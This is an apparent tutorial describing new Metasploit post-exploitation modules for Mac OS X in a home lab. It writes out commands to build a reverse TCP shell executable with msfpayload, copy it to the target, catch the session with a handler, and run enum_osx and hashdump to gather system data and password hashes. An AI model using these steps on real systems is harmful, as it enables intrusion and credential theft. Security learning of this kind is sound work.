Description: As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post-exploitation scripts has been developed and integrated into the Metasploit Framework repository. These scripts let you gather interesting information on a Mac OS X target.
Docs : http://eromang.zataz.com/2011/02/23/metasploit-mac-os-x-post-exploitation-enumeration-and-hash-dump/
Scenario :
1) Create a "test" executable for the targeted Mac OS X, here 10.5 PPC, with msfpayload.
sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X -o test
2) Upload this executable to the targeted Mac OS X, here with ssh
scp test ericromang@192.168.178.24:/Users/ericromang/
3) In msfconsole
use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j
4) Post exploitation 1 : With unprivileged user
Run ./test on Mac OS X
In msfconsole
use post/osx/gather/enum_osx
set SESSION 1
run
5) Post exploitation 2 : With privileged user
Run sudo ./test on Mac OS X
In msfconsole
use post/osx/gather/hashdump
set SESSION 1
run
Tags: metasploit, mac os x, apple, hack